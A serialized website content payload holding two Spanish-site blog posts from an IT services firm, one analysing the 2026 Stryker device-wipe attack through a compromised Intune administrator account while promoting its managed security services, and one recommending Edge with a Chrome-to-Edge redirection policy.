Account.",[2208],{"type":9,"value":20818,"toc":21052},[20819,20822,20825,20829,20831,20834,20837,20840,20844,20846,20849,20852,20855,20858,20862,20864,20867,20870,20874,20876,20879,20882,20885,20889,20891,20894,20900,20904,20906,20913,20916,20919,20922,20929,20932,20937,20946,20950,20952,20959,20962,20971,20974,20977,20980,20983,20986,20989,20993,20995,20998,21001,21004,21012,21015,21018,21021,21023],[12,20820,20821],{},"Wednesday, March 11, 2026. Employees in Stryker offices in 79 countries turned on their computers and found them blank. Login screens replaced by a logo. Corporate laptops, company phones, personal devices enrolled in the company's BYOD program. All wiped simultaneously, in the early hours of the morning. No ransomware. No malware signatures. 
Nothing an endpoint detection tool could catch.",[12,20823,20824],{},"The attacker, a pro-Iranian hacktivist group called Handala, had turned Stryker's own IT management infrastructure into the weapon.",[41,20826,20828],{"id":20827},"lo-que-realmente-ocurrió","What really happened",[12,20830,31],{},[12,20832,20833],{},"The core of the attack was not a sophisticated exploit or a zero-day vulnerability. It was something far simpler and, frankly, far more common: an administrator account was compromised, and that account had access to Microsoft Intune.",[12,20835,20836],{},"According to BleepingComputer's reporting, approximately 80,000 devices were wiped between 5:00 and 8:00 UTC. Handala claimed the number exceeded 200,000, including servers and mobile devices across the company's global operations in 79 countries.",[12,20838,20839],{},"No custom malware. No malicious binaries to detect. A living-off-the-land attack, executed entirely through a legitimate management console.",[41,20841,20843],{"id":20842},"por-qué-tuvo-éxito-este-ataque","Why this attack succeeded",[12,20845,31],{},[12,20847,20848],{},"There is a structural problem at the root of this, and it is not unique to Stryker. It is endemic across enterprises.",[12,20850,20851],{},"Most organizations treat administrative tasks and daily work as activities that can comfortably coexist on the same device, under the same user identity. An IT administrator answers emails, browses the web, clicks the occasional link and, from that same session, on that same machine, manages cloud infrastructure, approves access changes or, in this case, accesses a device management console with the power to wipe the entire fleet.",[12,20853,20854],{},"This is the attack surface. 
When the everyday work context and the privileged administration context share a common endpoint and a common identity, any compromise of that endpoint is automatically a compromise of everything that identity can reach. Phishing, credential theft by infostealer malware, adversary-in-the-middle (AiTM) session token theft: all of them become a direct route to the most powerful controls in your environment. No privilege escalation is needed. The attacker simply uses what is already there.",[12,20856,20857],{},"In Stryker's case, that access included an Intune tenant managing devices on six continents.",[41,20859,20861],{"id":20860},"cisa-ha-visto-suficiente","CISA has seen enough",[12,20863,31],{},[12,20865,20866],{},"The scale and audacity of the attack prompted an unusual response: CISA, the U.S. Cybersecurity and Infrastructure Security Agency, issued guidance that directly addresses the risk of compromised device management platforms. The agency confirmed that it was aware of the attack vector and urged organizations to take concrete steps, ensuring that high-impact Intune functions, such as device wipe, require approval from a second administrator before they execute.",[12,20868,20869],{},"This is a rare and significant signal. When a federal security agency issues specific guidance immediately after a concrete incident, the message is clear: this is not an exceptional case. It is a pattern, and other organizations probably have the same exposure.",[41,20871,20873],{"id":20872},"la-separación-no-es-un-lujo-es-el-control","Separation is not a luxury. It is the control.",[12,20875,31],{},[12,20877,20878],{},"The Stryker attack is a useful case study precisely because it illustrates the blast radius of a flat privilege model. 
The attacker did not need to escalate privileges through a chain of vulnerabilities. They obtained access to credentials, or to a session token, at one level and found that this level was already enough to cause catastrophic, global and irreversible damage.",[12,20880,20881],{},"The architectural answer to this problem has a name: the Microsoft Enterprise Access Model (EAM). Its central principle is tiered administration: privileged operations are performed using dedicated accounts and dedicated devices, strictly separated from the everyday work context. This least-privilege approach means that a compromised productivity account cannot reach the management plane, and a compromised management account cannot reach control plane operations. This applies equally to cloud-only environments and to hybrid setups that include a connection to on-premises Active Directory through Entra ID, where a single over-privileged account can still bridge the cloud and the domain.",[12,20883,20884],{},"The idea is simple. Administrative work is done on administrative devices. The identity used to manage your Microsoft 365 tenant, your Intune environment or your Azure infrastructure is never the same identity used to read email or join Teams calls. The device used for those administrative sessions is hardened, restricted and isolated from the usual Internet browsing and productivity context that creates the exposure. 
Lateral movement becomes structurally harder because there is no lateral path.",[41,20886,20888],{"id":20887},"dos-capas-de-defensa","Two layers of defense",[12,20890,31],{},[12,20892,20893],{},"Properly addressing this threat model requires working on two levels at once: securing who can access the management plane and its credentials, and hardening how that management plane itself is configured and operated. They are not the same problem, and both matter.",[12,20895,20896],{},[2772,20897],{"alt":20898,"src":20899},"Risk and product mapping for the Stryker attack scenario: Managed Red Tenant addresses identity and access risks, Managed Intune addresses endpoint management risks","https://res.cloudinary.com/c4a8/image/upload/v1774005366/blog/pics/stryker_risk_product_mapping.svg",[186,20901,20903],{"id":20902},"managed-red-tenant-proteger-el-contexto-administrativo","Managed Red Tenant: protecting the administrative context",[12,20905,47],{},[12,20907,20908,20909,1014],{},"The first layer is to isolate privileged access completely. This is the purpose of our ",[2630,20910,20912],{"href":20911},"/es/security/managed-red-tenant","Managed Red Tenant",[12,20914,20915],{},"The Managed Red Tenant provides a completely isolated, cloud-based administrative environment: a dedicated Microsoft Entra tenant («the Red Tenant») used exclusively for privileged operations. Administrative identities live here. Administrative devices are managed here. Nothing from the everyday work environment leaks in.",[12,20917,20918],{},"For the most critical roles, those with control plane access such as global administrators, we implement the «Clean Keyboard» approach: a physical Privileged Admin Workstation (PAW) with dedicated hardware, hardened policies and no exposure whatsoever to the everyday work context. 
For broader administrative roles, we offer scalable Virtual Access Workstations (VAW) built on a hardened Azure Virtual Desktop infrastructure inside the Red Tenant. The access path itself is protected through Microsoft Entra Private Access, enforcing Zero Trust Network Access and Conditional Access policies before any session can be established.",[12,20920,20921],{},"Microsoft Entra Internet Access blocks public internet access from administrative sessions and restricts connectivity strictly to privileged interfaces and authorized tenant environments. Near-real-time session revocation is possible through Universal Conditional Access Evaluation, which means a revoked credential does not persist as a valid session.",[12,20923,20924,20925,20928],{},"The Managed Red Tenant is monitored 24/7 by our ",[2630,20926,20927],{"href":2874},"Cloud Security Operations Center (CSOC)",", with detections developed specifically around administrative permissions and access patterns. An attacker who somehow compromised a credential in this environment would not have three undetected hours to run wipe commands against a global device fleet.",[12,20930,20931],{},"This is especially relevant for roles such as Intune administrators. They know how to secure clients, but securing a privileged administrator workstation requires a different skill set (enterprise access architecture, identity hardening, Zero Trust controls) that normally falls to the security team. A Managed Red Tenant removes that burden entirely: Intune administrators get a professionally managed, consistently hardened workstation without having to become experts in secure workstations. 
The same applies to any highly privileged role in the organization.",[20172,20933],{"thumb":20934,"alt":20935,"id":20936,":full-width":7656},"/thumbs/thumb-managed-red-tenant.jpg","Jan Geisbauer and Thomas Naunheim discuss the Managed Red Tenant cybersecurity strategy","rOEIvItNkjE",[52,20938,20939,20940],{"style":20179},"More on our ",[2630,20941,20945],{"href":20942,"target":2633,"rel":20943},"https://www.youtube.com/playlist?list=PLPxBXiOFJRHelegu_B-uZAyz2UrOSxioL",[20944],"noopener","YouTube channel",[186,20947,20949],{"id":20948},"managed-intune-reforzar-el-propio-plano-de-gestión","Managed Intune: hardening the management plane itself",[12,20951,47],{},[12,20953,20954,20955,1014],{},"The second layer is to ensure that Intune, the tool that was weaponized in the Stryker attack, is configured, operated and continuously maintained to the highest security standard. That is the role of our ",[2630,20956,20958],{"href":20957},"/es/entra-intune/managed-intune","Managed Intune",[12,20960,20961],{},"One of the central findings from incidents like Stryker's is that organizations often inherit Intune environments that have grown organically over time: policies stacked on policies, manual changes made through the portal that are hard to audit, and security baselines that have not kept pace with Microsoft's own evolving recommendations. 
That kind of environment is exactly where configuration drift creates exploitable gaps.",[12,20963,20964,20965,20970],{},"Microsoft recently published ",[2630,20966,20969],{"href":20967,"rel":20968},"https://techcommunity.microsoft.com/blog/intunecustomersuccess/best-practices-for-securing-microsoft-intune/4502117",[3135],"best practices for securing Microsoft Intune",", a timely signal that even Microsoft considers Intune hardening a topic that needs explicit attention across the industry. Our Managed Intune service is built exactly on these principles, and we have implemented Microsoft's recommendations as part of our baseline.",[12,20972,20973],{},"Our Managed Intune service is based on the glueckkanja Intune Foundation: a proven and continuously maintained set of best practices for device management, delivered entirely as code using Terraform and our own TerraProvider. Every change is automated, version-controlled and auditable. There are no undocumented «click in the portal» configurations that an attacker could exploit by understanding the gap between what was intended and what was configured.",[12,20975,20976],{},"From a security perspective, this means that Zero Trust configurations, App Protection Policies and endpoint security are enforced by design, consistently, across Windows, macOS, iOS and Android: not as one-off implementations, but as continuously enforced evergreen baselines that follow the evolution of Microsoft's own security guidance.",[12,20978,20979],{},"Fundamentally, Managed Intune reflects the operational maturity needed to secure modern endpoint management: continuous compliance monitoring, structured change governance and regular service reviews, not as optional extras but as baseline operations. 
But securing the Intune configuration is only half the problem. If the administrator accessing the console does so from an unprotected device, the management plane remains exposed regardless, and that is exactly where the Managed Red Tenant completes the model.",[12,20981,20982],{},"Since all configurations are deployed as code based on the Intune Foundation, we apply a strict four-eyes principle with peer review, additional automated validation and controlled deployment pipelines. This eliminates unmanaged portal changes within the Intune Foundation and guarantees a consistent, auditable and secure baseline across all devices.",[12,20984,20985],{},"Administrative access is governed by a least-privilege model using GDAP and Azure Lighthouse, with clearly defined responsibilities and strictly scoped access to the customer tenant. This significantly reduces the attack surface associated with privileged operations.",[12,20987,20988],{},"Device-level actions, including destructive operations, remain the customer's responsibility, since their execution is closely tied to organization-specific processes and internal governance frameworks. Microsoft and CISA recommend protecting such actions with additional safeguards, such as multi-admin approval controls within Intune.",[41,20990,20992],{"id":20991},"la-pregunta-incómoda","The uncomfortable question",[12,20994,31],{},[12,20996,20997],{},"The Stryker attack is not an indictment of Microsoft Intune. Intune behaved exactly as designed. It executed the commands it received from an authenticated administrator. The failure was not in the tool. 
It was in the absence of controls over who could access that tool, from what context and with what level of authorization.",[12,20999,21000],{},"It is a governance and architecture problem. And it is the same problem that exists in most organizations running Microsoft 365 today.",[12,21002,21003],{},"If your administrators access Intune, Entra ID or Azure from the same devices and identities they use for daily work, and if your Intune environment has grown through years of manual portal changes instead of a structured, automated operating model, you are carrying the same structural risk Stryker carried on March 10. The question is whether an adversary finds that exposure before you address it.",[12,21005,21006,21008,21009,21011],{},[2630,21007,20912],{"href":20911}," addresses the privilege and identity layer. ",[2630,21010,20958],{"href":20957}," addresses the configuration and operations layer. Together, they close the two gaps that made the Stryker attack possible.",[12,21013,21014],{},"If you want to understand how either service applies to your current environment, or where your specific points of exposure are, we would be happy to go through it with you.",[12,21016,21017],{},"We will also shortly publish a detailed article examining how the Stryker incident was possible in the first place.",[41,21019,4444],{"id":21020},"más-información",[12,21022,31],{},[1255,21024,21025,21032,21038,21045],{},[1258,21026,21027],{},[2630,21028,21031],{"href":21029,"rel":21030},"https://www.cisa.gov/secure-cloud-business-applications",[3135],"CISA: Securing Cloud Business Applications",[1258,21033,21034],{},[2630,21035,21037],{"href":20967,"rel":21036},[3135],"Microsoft: Best practices for securing Microsoft 
Intune",[1258,21039,21040],{},[2630,21041,21044],{"href":21042,"rel":21043},"https://techcrunch.com/2026/03/19/cisa-urges-companies-to-secure-microsoft-intune-systems-after-hackers-mass-wipe-stryker-devices/?utm_campaign=social",[3135],"TechCrunch: CISA urges companies to secure Microsoft Intune systems after hackers mass-wipe Stryker devices",[1258,21046,21047],{},[2630,21048,21051],{"href":21049,"rel":21050},"https://marketplace.microsoft.com/de-de/product/saas/glueckkanja-gabag.redtenant?tab=overview",[3135],"Managed Red Tenant on Azure Marketplace",{"title":65,"searchDepth":111,"depth":111,"links":21053},[21054,21055,21056,21057,21058,21062,21063],{"id":20827,"depth":111,"text":20828},{"id":20842,"depth":111,"text":20843},{"id":20860,"depth":111,"text":20861},{"id":20872,"depth":111,"text":20873},{"id":20887,"depth":111,"text":20888,"children":21059},[21060,21061],{"id":20902,"depth":329,"text":20903},{"id":20948,"depth":329,"text":20949},{"id":20991,"depth":111,"text":20992},{"id":21020,"depth":111,"text":4444},{"lang":2170,"seoTitle":21065,"titleClass":2172,"date":21066,"categories":21067,"blogtitlepic":21068,"socialimg":21069,"customExcerpt":21070,"keywords":21071,"hreflang":21072,"asideNav":21079,"contactInContent":21094,"maxContent":2167,"published":2180},"The Stryker Attack: How a Compromised Administrator Account Wiped 80,000 Devices through Intune","2026-03-20",[2175],"head-stryker.jpg","/blog/heads/head-stryker.jpg","On March 11, 2026, Handala wiped devices in 79 countries using nothing but a compromised Intune administrator account. No malware, no exploit, just legitimate management tools turned into a weapon. 
This is what happened, why it worked and how the two architectural gaps that made it possible can be closed.","Stryker attack, Handala, Microsoft Intune wipe, privileged access management, administrator workstation, Managed Red Tenant, Managed Intune, Zero Trust, Privileged Admin Workstation, PAW, Enterprise Access Model, CISA, endpoint management security",[21073,21075,21077],{"lang":2260,"href":21074},"/de/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2170,"href":21076},"/es/posts/2026-03-20-stryker-attack-intune-privilege",{"lang":2257,"href":21078},"/en/posts/2026-03-20-stryker-attack-intune-privilege",{"menuItems":21080},[21081,21083,21085,21087,21090,21092],{"href":21082,"text":20828},"#lo-que-realmente-ocurrio",{"href":21084,"text":20843},"#por-que-tuvo-exito-este-ataque",{"href":21086,"text":20861},"#cisa-ha-visto-suficiente",{"href":21088,"text":21089},"#la-separacion-no-es-un-lujo-es-el-control","Separation is not a luxury",{"href":21091,"text":20888},"#dos-capas-de-defensa",{"href":21093,"text":20992},"#la-pregunta-incomoda",{"quote":2180,"infos":21095},{"bgColor":2200,"headline":21096,"subline":21097,"level":41,"textStyling":2203,"flush":2204,"person":21098,"form":21100},"Contact us","Want to know how Managed Red Tenant and Managed Intune close the gaps the Stryker attack exploited? Fill out the form and we will explain how it applies to your environment.",{"image":2206,"cloudinary":2180,"alt":2207,"name":2208,"quotee":2208,"quoteeTitle":2209,"quote":21099},"The Stryker attack is a wake-up call for every organization using Microsoft Intune. The tool did exactly what it was told. The problem was that nobody should have been able to tell it: not from a compromised everyday account, not without a second approval, not without an isolated administrative environment. 
That is the gap we help close.",{"ctaText":2212,"cta":21101,"method":2168,"action":2215,"fields":21102},{"skin":2214},[21103,21105,21107,21109,21112,21115,21116,21117,21119,21120,21121],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":21104},"Please enter your name.",{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":21106},"Please enter your company.",{"label":2226,"type":2227,"id":2227,"required":2180,"requiredMsg":21108},"Please enter your email address.",{"label":21110,"type":2231,"id":2232,"required":2167,"requiredMsg":21111},"Your message to us","Please enter a message.",{"label":21113,"type":2236,"id":2237,"required":2180,"requiredMsg":21114},"Your data will be stored and used to respond to your request. For more information, see our \u003Ca href=\"/es/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":2240,"id":2241,"value":2175},{"type":2240,"id":2243,"value":2244},{"type":2240,"id":2246,"value":21118},"Form: Blog Stryker Attack Intune Privilege | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"type":2240,"id":2254},"/posts/2026-03-20-stryker-attack-intune-privilege",{"title":20815,"description":20821},"posts/2026-03-20-stryker-attack-intune-privilege",[18399,21126,3439],"Privileged Access","8SGuheZh7VmiwYg_o_cs7OBIREEj6gDVPhczOorybMo",{"id":21129,"title":21130,"author":21131,"body":21132,"cta":2165,"description":21136,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":21320,"moment":21322,"navigation":2180,"path":21349,"seo":21350,"stem":21351,"tags":2165,"webcast":2167,"__hash__":21352},"content_es/posts/2026-03-21-microsoft-edge-corporate-browser.md","Why Edge should be your only corporate 
browser",[2330],{"type":9,"value":21133,"toc":21312},[21134,21137,21140,21142,21148,21152,21154,21157,21161,21163,21166,21180,21184,21186,21192,21198,21201,21243,21251,21255,21257,21265,21276,21278,21280,21283,21309],[12,21135,21136],{},"In enterprise environments, the choice of browser is not a minor detail. It determines how much security, how much management effort and how much productivity you actually get. Google Chrome has long been the obvious choice, but Microsoft Edge has evolved to offer real advantages, especially when Microsoft 365 is in use and management is done through Microsoft Intune.",[41,21138,18270],{"id":21139},"seguridad",[12,21141,31],{},[12,21143,21144,21145,21147],{},"A managed Microsoft Edge ensures that security features are applied consistently across all endpoints. With native integration into Microsoft Defender SmartScreen, Edge protects against phishing, malware and other threats. Through Intune, policies can be fine-tuned: controlling behaviour, blocking risky extensions and enforcing safe browsing practices. ",[2630,21146,20958],{"href":20957}," from glueckkanja includes up-to-date Edge policies aligned with Microsoft's security baselines.",[41,21149,21151],{"id":21150},"sincronización-con-entra-id","Synchronization with Entra ID",[12,21153,31],{},[12,21155,21156],{},"Edge securely synchronizes user data such as favorites, passwords and settings across devices using Entra ID accounts. 
This is especially relevant in hybrid work environments, where employees switch between corporate laptops, virtual desktops and mobile devices without losing context or productivity.",[41,21158,21160],{"id":21159},"complejidad-por-usar-varios-navegadores","Complexity from using multiple browsers",[12,21162,31],{},[12,21164,21165],{},"Maintaining Google Chrome alongside Edge creates additional work:",[1255,21167,21168,21174],{"style":20160},[1258,21169,21170,21173],{},[251,21171,21172],{},"Backup and synchronization:"," Other browsers usually require third-party accounts, such as a Google account, to enable synchronization.",[1258,21175,21176,21179],{},[251,21177,21178],{},"Policy maintenance:"," Each browser needs its own set of security and configuration policies. That consumes resources, increases the risk of misconfiguration and complicates audits.",[41,21181,21183],{"id":21182},"redirección-de-chrome-via-intune","Chrome redirection via Intune",[12,21185,31],{},[12,21187,21188,21189,21191],{},"To move Chrome users to Edge, a redirection policy can be configured through Microsoft Intune, available within minutes through ",[2630,21190,20958],{"href":20957}," from glueckkanja. 
Users land on a page that presents Microsoft Edge as the default corporate browser, with a direct link to open it.",[12,21193,21194],{},[2772,21195],{"alt":21196,"src":21197},"Microsoft Edge as the default corporate browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[12,21199,21200],{},"The configuration policy defines how Chrome is restricted and redirected:",[1255,21202,21203,21216,21225,21231,21237],{"style":20160},[1258,21204,21205,21208,21209,21212,21213,1014],{},[251,21206,21207],{},"URL allowlist:"," Only specific URLs are allowed, such as the landing page ",[63,21210,21211],{},"https://edge.glueckkanja.com/"," and the moniker ",[63,21214,21215],{},"microsoft-edge:*",[1258,21217,21218,21221,21222,21224],{},[251,21219,21220],{},"URL blocklist:"," All other URLs are blocked (",[63,21223,1292],{},"), which prevents general browsing in Chrome.",[1258,21226,21227,21230],{},[251,21228,21229],{},"Home page and new tab:"," Both point to the landing page, which invites users to use Edge.",[1258,21232,21233,21236],{},[251,21234,21235],{},"Protocol handling:"," When clicking URLs on the landing page, Chrome opens Edge automatically.",[1258,21238,21239,21242],{},[251,21240,21241],{},"Extension control:"," Additional settings prevent the installation of extensions.",[12,21244,21245,21246],{},"Example policy for download: ",[2630,21247,21250],{"href":21248,"rel":21249},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[3135],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[41,21252,21254],{"id":21253},"página-de-destino-via-github-pages","Landing page via GitHub Pages",[12,21256,31],{},[12,21258,21259,21260],{},"The page runs on GitHub Pages. 
Anyone who wants to adapt it can do so directly in the project: ",[2630,21261,21264],{"href":21262,"rel":21263},"https://github.com/glueckkanja/edge-redirection-landingpage",[3135],"edge-redirection-landingpage",[12,21266,21267],{},[2630,21268,21273],{"role":3058,"className":21269,"dataText":21270,"href":21271,"target":2633,"rel":21272,"type":3068},[3060,3061,3064,3065],"View the landing page","https://edge.glueckkanja.com",[20944],[102,21274,21270],{"className":21275},[3072],[41,21277,17323],{"id":17322},[12,21279,31],{},[12,21281,21282],{},"Microsoft Edge offers a secure, manageable browsing environment with deep integration into Microsoft 365, which makes it the logical choice as the default corporate browser. The main advantages:",[1255,21284,21285,21288,21291,21294,21297,21300,21303,21306],{"style":20160},[1258,21286,21287],{},"Integration with Entra ID and SSO",[1258,21289,21290],{},"Cloud synchronization and backup through the Microsoft 365 account across multiple platforms",[1258,21292,21293],{},"Integrated security ecosystem with Microsoft Defender SmartScreen and Microsoft Endpoint DLP",[1258,21295,21296],{},"Support for Intune App Protection Policies",[1258,21298,21299],{},"Browser management from the Microsoft 365 admin center and Intune",[1258,21301,21302],{},"Internet Explorer mode for legacy applications",[1258,21304,21305],{},"Corporate branding",[1258,21307,21308],{},"Copilot integration",[12,21310,21311],{},"Standardizing on Edge reduces complexity, strengthens security and simplifies support. 
Extending the redirection approach to other browsers is a sensible next step.",{"title":65,"searchDepth":111,"depth":111,"links":21313},[21314,21315,21316,21317,21318,21319],{"id":21139,"depth":111,"text":18270},{"id":21150,"depth":111,"text":21151},{"id":21159,"depth":111,"text":21160},{"id":21182,"depth":111,"text":21183},{"id":21253,"depth":111,"text":21254},{"id":17322,"depth":111,"text":17323},{"lang":2170,"seoTitle":21321,"titleClass":2172,"date":21322,"blogtitlepic":21323,"socialimg":21324,"customExcerpt":21325,"keywords":21326,"hreflang":21327,"published":2180,"asideNav":21334},"Microsoft Edge as a secure corporate browser: security, synchronization and Chrome redirection via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","The browser nobody deliberately chose is today the one everyone has to manage. Most companies never made an active decision for Chrome; it was simply there, with its own sync logic, its own account layer, its own policy surface. Microsoft Edge is something else: a browser that integrates directly into the infrastructure companies already have. Entra ID, Intune, Defender. 
This post shows how to make that change, how to redirect Chrome to a landing page using an Intune policy and what disappears when you stop maintaining two browsers in parallel.","Microsoft Edge, corporate browser, Microsoft Intune, Entra ID, Chrome redirection, Managed Intune, browser policy, Microsoft Defender SmartScreen, enterprise browser, browser management, URL blocklist, URL allowlist",[21328,21330,21332],{"lang":2260,"href":21329},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2257,"href":21331},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":2170,"href":21333},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":21335},[21336,21338,21340,21343,21345,21347],{"href":21337,"text":18270},"#seguridad",{"href":21339,"text":21151},"#sincronización-con-entra-id",{"href":21341,"text":21342},"#complejidad-por-usar-varios-navegadores","Complexity from multiple browsers",{"href":21344,"text":21183},"#redirección-de-chrome-via-intune",{"href":21346,"text":21254},"#página-de-destino-via-github-pages",{"href":21348,"text":17323},"#conclusión","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":21130,"description":21136},"posts/2026-03-21-microsoft-edge-corporate-browser","4dzPrCmYa_qBIk_LjU-Qvt9euryPlP8X7fC0e5Rif1s",{"id":4,"title":5,"author":21354,"body":21355,"cta":2165,"description":14,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":22824,"moment":2173,"navigation":2180,"path":2264,"seo":22855,"stem":2266,"tags":22856,"webcast":2167,"__hash__":2273},[7],{"type":9,"value":21356,"toc":22788},[21357,21359,21361,21363,21365,21367,21369,21371,21373,21375,21377,21379,21381,21388,21390,21392,21399,21401,21403,21405,21407,21421,21423,21430,21432,21439,21443,21445,21447,21449,21456,21464,21466,21468,21470,21472,21474,21481,21483,21485,21492,21494,21496,21498,21500,21502,21504,21511,21513,21515,21519,21521,21585,21587,21613,21615,2161